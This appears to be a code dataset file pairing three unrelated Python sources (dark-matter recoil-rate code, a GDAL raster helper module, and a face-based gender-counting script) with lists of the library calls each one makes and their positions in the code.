# for k in range(0,ne):
# mask = (abs(costh)<sqrt(S_edges[k+1]/A_CR))*(abs(costh)>sqrt(S_edges[k]/A_CR))
# R[k,i] = 0.5*dE*(sum(dRf1[mask])+sum(dRf2[mask]))
# dRf1 = 1.0*dRf2
# return E_r_centers,S_centers,R
|
[
"LabFuncs.LabVelocity",
"numpy.ones",
"numpy.shape",
"numpy.sin",
"numpy.exp",
"LabFuncs.LabVelocitySimple",
"numpy.meshgrid",
"LabFuncs.efficiency",
"numpy.linspace",
"LabFuncs.FormFactorHelm",
"numpy.log10",
"numpy.trapz",
"numpy.size",
"scipy.special.erf",
"Params.WIMP",
"numpy.cos",
"scipy.spatial.ConvexHull",
"numpy.zeros",
"numpy.array",
"numpy.column_stack",
"numpy.sqrt"
] |
[((1528, 1560), 'LabFuncs.LabVelocitySimple', 'LabFuncs.LabVelocitySimple', (['(67.0)'], {}), '(67.0)\n', (1554, 1560), False, 'import LabFuncs\n'), ((2213, 2240), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (2224, 2240), False, 'import Params\n'), ((2618, 2646), 'numpy.trapz', 'trapz', (['dR[mask]', 'Efine[mask]'], {}), '(dR[mask], Efine[mask])\n', (2623, 2646), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((3351, 3360), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (3355, 3360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3370, 3377), 'numpy.size', 'size', (['t'], {}), '(t)\n', (3374, 3377), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3387, 3402), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3392, 3402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3415, 3424), 'numpy.zeros', 'zeros', (['ne'], {}), '(ne)\n', (3420, 3424), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4653, 4701), 'numpy.sqrt', 'sqrt', (['(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)'], {}), '(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)\n', (4657, 4701), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5344, 5353), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5348, 5353), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5363, 5370), 'numpy.size', 'size', (['t'], {}), '(t)\n', (5367, 5370), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6951, 6978), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (6962, 6978), False, 'import Params\n'), ((6987, 7030), 'numpy.linspace', 'linspace', (['(-pi)', '(pi - 2 * pi / (1.0 * np))', 'np'], {}), '(-pi, pi - 2 * pi / (1.0 * np), np)\n', (6995, 7030), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7034, 7054), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7039, 7054), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7063, 7083), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7068, 7083), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9112, 9142), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (9120, 9142), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9157, 9183), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc + 1)'], {}), '(0.0, 1.0, nc + 1)\n', (9165, 9183), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9473, 9505), 'numpy.meshgrid', 'meshgrid', (['E_r_edges', 'costh_edges'], {}), '(E_r_edges, costh_edges)\n', (9481, 9505), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((10003, 10033), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (10011, 10033), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10044, 10070), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(ne + 1)'], {}), '(0.0, 1.0, ne + 1)\n', (10052, 10070), False, 'from numpy import 
pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10085, 10116), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc_fine + 1)'], {}), '(0.0, 1.0, nc_fine + 1)\n', (10093, 10116), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10320, 10341), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (10325, 10341), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11923, 11953), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (11931, 11953), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12016, 12046), 'numpy.meshgrid', 'meshgrid', (['E_o_edges', 'E_o_edges'], {}), '(E_o_edges, E_o_edges)\n', (12024, 12046), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((12054, 12090), 'numpy.sqrt', 'sqrt', (['(1.0 / A_CR * 1.0 / (I / S + 1))'], {}), '(1.0 / A_CR * 1.0 / (I / S + 1))\n', (12058, 12090), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12558, 12579), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (12563, 12579), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2184, 2196), 'numpy.log10', 'log10', (['(200.0)'], {}), '(200.0)\n', (2189, 2196), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((2313, 2333), 'numpy.array', 'array', (['[Jan1 + 67.0]'], {}), '([Jan1 + 67.0])\n', (2318, 2333), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2415, 2446), 'LabFuncs.efficiency', 'LabFuncs.efficiency', (['Nuc', 'Efine'], {}), '(Nuc, Efine)\n', (2434, 2446), False, 'import LabFuncs\n'), ((3034, 3043), 'numpy.sqrt', 'sqrt', (['(2.0)'], {}), '(2.0)\n', (3038, 3043), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3174, 3205), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (3197, 3205), False, 'import LabFuncs\n'), ((3681, 3696), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3686, 3696), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5153, 5184), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (5176, 5184), False, 'import LabFuncs\n'), ((5491, 5547), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (5511, 5547), False, 'import LabFuncs\n'), ((7113, 7129), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7117, 7129), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7143, 7157), 'numpy.zeros', 'zeros', ([], {'shape': 'n'}), '(shape=n)\n', (7148, 7157), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((1329, 1360), 'numpy.sqrt', 'sqrt', (['(1.0 / (2 * m_N_keV * E_r))'], {}), '(1.0 / (2 * m_N_keV * E_r))\n', (1333, 1360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3529, 3585), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[0]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[0], Loc, HaloModel.RotationSpeed)\n', (3549, 3585), False, 'import LabFuncs\n'), ((4729, 4737), 'numpy.shape', 'shape', (['E'], {}), 
'(E)\n', (4734, 4737), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5393, 5402), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5397, 5402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5890, 5900), 'numpy.shape', 'shape', (['E_r'], {}), '(E_r)\n', (5895, 5900), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6018, 6126), 'numpy.exp', 'exp', (['(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))'], {}), '(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))\n', (6021, 6126), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6243, 6282), 'numpy.exp', 'exp', (['(-v_esc ** 2.0 / (2 * sig_v ** 2.0))'], {}), '(-v_esc ** 2.0 / (2 * sig_v ** 2.0))\n', (6246, 6282), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7809, 7823), 'numpy.size', 'size', (['E_r_vals'], {}), '(E_r_vals)\n', (7813, 7823), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7837, 7853), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7841, 7853), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7867, 7888), 'numpy.zeros', 'zeros', ([], {'shape': '(nc, ne)'}), '(shape=(nc, ne))\n', (7872, 7888), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12117, 12125), 'numpy.shape', 'shape', (['C'], {}), '(C)\n', (12122, 12125), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12651, 12766), 'numpy.array', 'array', (['[E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j + 1],\n E[i + 1, j], E[i + 1, j + 1]]'], {}), '([E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j +\n 1], E[i + 1, j], E[i + 1, j + 1]])\n', (12656, 12766), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12771, 12886), 'numpy.array', 'array', (['[C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j + 1],\n C[i + 1, j], C[i + 1, j + 1]]'], {}), '([C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j +\n 1], C[i + 1, j], C[i + 1, j + 1]])\n', (12776, 12886), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12891, 12966), 'numpy.array', 'array', (['[0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]]'], {}), '([0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]])\n', (12896, 12966), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3753, 3809), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (3773, 3809), False, 'import LabFuncs\n'), ((3952, 3962), 'scipy.special.erf', 'erf', (['(x + y)'], {}), '(x + y)\n', (3955, 3962), False, 'from scipy.special import erf\n'), ((3961, 3971), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (3964, 3971), False, 'from scipy.special import erf\n'), ((3987, 3999), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (3990, 3999), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4033, 4039), 'scipy.special.erf', 'erf', (['z'], {}), '(z)\n', 
(4036, 4039), False, 'from scipy.special import erf\n'), ((4040, 4050), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (4043, 4050), False, 'from scipy.special import erf\n'), ((4072, 4084), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (4075, 4084), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5430, 5439), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5434, 5439), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5951, 5978), 'numpy.sqrt', 'sqrt', (['(2 * pi * sig_v ** 2.0)'], {}), '(2 * pi * sig_v ** 2.0)\n', (5955, 5978), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7287, 7309), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7291, 7309), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7340, 7362), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7344, 7362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7425, 7447), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7429, 7447), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7478, 7500), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7482, 7500), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11192, 11235), 'numpy.linspace', 'linspace', (['E_r_edges[j]', 'E_r_edges[j + 1]', '(5)'], {}), '(E_r_edges[j], E_r_edges[j + 1], 5)\n', (11200, 11235), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13019, 13042), 'numpy.column_stack', 'column_stack', (['(x, y, z)'], {}), '((x, y, z))\n', (13031, 13042), False, 'from numpy import nan, isnan, column_stack, amin, amax\n'), ((7279, 7286), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7282, 7286), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7332, 7339), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7335, 7339), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7417, 7424), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7420, 7424), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7470, 7477), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7473, 7477), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((11345, 11362), 'numpy.sqrt', 'sqrt', (['(smin / A_CR)'], {}), '(smin / A_CR)\n', (11349, 11362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11361, 11378), 'numpy.sqrt', 'sqrt', (['(smax / A_CR)'], {}), '(smax / A_CR)\n', (11365, 11378), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13066, 13115), 'scipy.spatial.ConvexHull', 'ConvexHull', (['points'], {'qhull_options': '"""W1e-15 E1e-15"""'}), "(points, qhull_options='W1e-15 E1e-15')\n", (13076, 13115), False, 'from scipy.spatial import ConvexHull\n'), ((3975, 3983), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (3979, 3983), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4054, 4062), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (4058, 4062), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, 
logspace\n'), ((8058, 8080), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8062, 8080), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8115, 8137), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8119, 8137), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7578, 7592), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7582, 7592), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7693, 7707), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7697, 7707), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8050, 8057), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8053, 8057), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8107, 8114), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8110, 8114), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8501, 8523), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8505, 8523), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8562, 8584), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8566, 8584), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8220, 8234), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8224, 8234), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8493, 8500), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8496, 8500), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8554, 8561), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8557, 8561), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8681, 8695), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8685, 8695), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n')]
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Classes for basic raster and array manipulation"""
import osgeo
from osgeo import gdal, osr
import numpy as np
# ---------------------------------------------------- Helpers ---------------------------------------------------------
def gdal_open(filename):
"""
Read an image as numpy array
"""
gdal_ds = gdal.Open(filename)
if gdal_ds is None:
raise Exception("Unable to open file {}".format(filename))
return gdal_ds
def read_as_np(filename):
"""
Read a raster image as numpy array
"""
gdal_ds = gdal_open(filename)
return gdal_ds.ReadAsArray()
def set_gdal_cachemax(gdal_cachemax):
"""
Set GDAL_CACHEMAX
"""
gdal.SetConfigOption("GDAL_CACHEMAX", gdal_cachemax)
def get_sub_arr(np_arr, patch_location, patch_size, ref_patch_size):
"""
    Extract the sub-array of np_arr corresponding to one patch
    :param np_arr: the numpy array (e.g. the array read from edge_stats_fn or clouds_stats_fn)
    :param patch_location: patch location (x, y)
    :param patch_size: patch size (single value); it sets the size of the returned sub array, relative to ref_patch_size
:param ref_patch_size: reference patch size (single value)
:return: the sub array
"""
scale = int(patch_size / ref_patch_size)
return np_arr[scale * patch_location[1]:scale * (patch_location[1] + 1),
scale * patch_location[0]:scale * (patch_location[0] + 1)]
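# --- hypothetical example, not part of the original file: with ref_patch_size=64 and
# --- patch_size=128 the scale is 2, so patch (x=3, y=5) maps to rows 10:12, cols 6:8 ---
stats_arr = np.arange(20 * 20).reshape(20, 20)   # illustrative stand-in statistics array
sub = get_sub_arr(stats_arr, patch_location=(3, 5), patch_size=128, ref_patch_size=64)
assert sub.shape == (2, 2)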
def save_numpy_array_as_raster(ref_fn, np_arr, out_fn, scale=1.0):
"""
Save a numpy array into a raster file
:param ref_fn: reference raster (output will have the same proj, geotransform, size)
:param np_arr: numpy array
:param out_fn: output filename for the raster
:param scale: output pixel spacing scaling
"""
gdal.AllRegister()
in_ds = gdal_open(ref_fn)
driver = in_ds.GetDriver()
out_ds = driver.Create(out_fn, np_arr.shape[1], np_arr.shape[0], 1, gdal.GDT_Int32)
out_band = out_ds.GetRasterBand(1)
out_band.WriteArray(np.transpose(np_arr), 0, 0)
out_band.FlushCache()
geotransform = in_ds.GetGeoTransform()
# Update if we want to change pixel spacing
if scale != 1.0:
geotransform = list(geotransform)
geotransform[1] *= scale
geotransform[5] *= scale
geotransform = tuple(geotransform)
out_ds.SetGeoTransform(geotransform)
out_ds.SetProjection(in_ds.GetProjection())
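# --- hedged usage sketch, not part of the original file (file names are hypothetical) ---
# save_numpy_array_as_raster("reference.tif", np.zeros((256, 256), dtype=np.int32),
#                            "stats.tif", scale=2.0)   # output pixels 2x coarser than the reference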
def convert_to_4326(coordinates, gdal_ds):
"""
Convert some coordinates to 4326
:param coordinates: (x, y) coordinates, expressed in the coordinate system of the dataset `gdal_ds`
:param gdal_ds: gdal dataset
:return:
"""
# Get the coordinate system of the dataset
initial_crs = osr.SpatialReference()
initial_crs.ImportFromWkt(gdal_ds.GetProjectionRef())
# Set up the coordinate reference system, WGS84
crs_4326 = osr.SpatialReference()
if int(osgeo.__version__[0]) >= 3:
# GDAL 3 changes axis order: https://github.com/OSGeo/gdal/issues/1546
crs_4326.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)
crs_4326.ImportFromEPSG(4326)
# create a transform object to convert between coordinate systems
transform = osr.CoordinateTransformation(initial_crs, crs_4326)
# Transform the coordinates in lat long
lon, lat, _ = transform.TransformPoint(*coordinates)
return lon, lat
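# --- illustrative chaining of the helpers above, not part of the original file (path hypothetical) ---
# ds = gdal_open("scene.tif")
# x0, _, _, y0, _, _ = ds.GetGeoTransform()   # upper-left corner in the dataset's native CRS
# lon, lat = convert_to_4326((x0, y0), ds)    # the same point expressed in EPSG:4326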
|
[
"osgeo.osr.CoordinateTransformation",
"numpy.transpose",
"osgeo.gdal.SetConfigOption",
"osgeo.gdal.Open",
"osgeo.osr.SpatialReference",
"osgeo.gdal.AllRegister"
] |
[((1412, 1431), 'osgeo.gdal.Open', 'gdal.Open', (['filename'], {}), '(filename)\n', (1421, 1431), False, 'from osgeo import gdal, osr\n'), ((1776, 1828), 'osgeo.gdal.SetConfigOption', 'gdal.SetConfigOption', (['"""GDAL_CACHEMAX"""', 'gdal_cachemax'], {}), "('GDAL_CACHEMAX', gdal_cachemax)\n", (1796, 1828), False, 'from osgeo import gdal, osr\n'), ((2826, 2844), 'osgeo.gdal.AllRegister', 'gdal.AllRegister', ([], {}), '()\n', (2842, 2844), False, 'from osgeo import gdal, osr\n'), ((3779, 3801), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3799, 3801), False, 'from osgeo import gdal, osr\n'), ((3928, 3950), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3948, 3950), False, 'from osgeo import gdal, osr\n'), ((4268, 4319), 'osgeo.osr.CoordinateTransformation', 'osr.CoordinateTransformation', (['initial_crs', 'crs_4326'], {}), '(initial_crs, crs_4326)\n', (4296, 4319), False, 'from osgeo import gdal, osr\n'), ((3057, 3077), 'numpy.transpose', 'np.transpose', (['np_arr'], {}), '(np_arr)\n', (3069, 3077), True, 'import numpy as np\n')]
|
import face_recognition
from deepface import DeepFace
import cv2
import numpy as np
from tensorflow.keras.preprocessing import image
import pyscreenshot as ImageGrab
model = ""
def preprocess_img(img, target_size=(224,224)):
img = cv2.resize(img, target_size)
img_pixels = image.img_to_array(img)
img_pixels = np.expand_dims(img_pixels, axis = 0)
img_pixels /= 255 #normalize input in [0, 1]
return img_pixels
def grab_screenshot():
im = ImageGrab.grab()
return im
def recog_gender(img_file=None, image=None):
global model
if model == "": # only need to build the model for the first time
model = DeepFace.build_model("Gender")
if img_file:
image = face_recognition.load_image_file(img_file)
face_locations = face_recognition.face_locations(image)
#print("I found {} face(s) in this photograph.".format(len(face_locations)))
count_man = 0
count_woman = 0
for face_location in face_locations:
top, right, bottom, left = face_location
# print("A face is located at pixel location Top: {}, Left: {}, Bottom: {}, Right: {}".format(top, left, bottom, right))
face_image = image[top:bottom, left:right]
face_image = preprocess_img(img=face_image)
gender_predictions = model.predict(face_image)[0,:]
if np.argmax(gender_predictions) == 0:
count_woman += 1
elif np.argmax(gender_predictions) == 1:
count_man += 1
return count_man, count_woman
if __name__ == '__main__':
count_man, count_woman = recog_gender(img_file="sample_zoom_screenshot.png")
print("man:", count_man, "woman:", count_woman )
|
[
"numpy.argmax",
"pyscreenshot.grab",
"tensorflow.keras.preprocessing.image.img_to_array",
"numpy.expand_dims",
"deepface.DeepFace.build_model",
"face_recognition.face_locations",
"face_recognition.load_image_file",
"cv2.resize"
] |
[((237, 265), 'cv2.resize', 'cv2.resize', (['img', 'target_size'], {}), '(img, target_size)\n', (247, 265), False, 'import cv2\n'), ((283, 306), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', (['img'], {}), '(img)\n', (301, 306), False, 'from tensorflow.keras.preprocessing import image\n'), ((324, 358), 'numpy.expand_dims', 'np.expand_dims', (['img_pixels'], {'axis': '(0)'}), '(img_pixels, axis=0)\n', (338, 358), True, 'import numpy as np\n'), ((466, 482), 'pyscreenshot.grab', 'ImageGrab.grab', ([], {}), '()\n', (480, 482), True, 'import pyscreenshot as ImageGrab\n'), ((775, 813), 'face_recognition.face_locations', 'face_recognition.face_locations', (['image'], {}), '(image)\n', (806, 813), False, 'import face_recognition\n'), ((647, 677), 'deepface.DeepFace.build_model', 'DeepFace.build_model', (['"""Gender"""'], {}), "('Gender')\n", (667, 677), False, 'from deepface import DeepFace\n'), ((711, 753), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (['img_file'], {}), '(img_file)\n', (743, 753), False, 'import face_recognition\n'), ((1326, 1355), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1335, 1355), True, 'import numpy as np\n'), ((1404, 1433), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1413, 1433), True, 'import numpy as np\n')]
|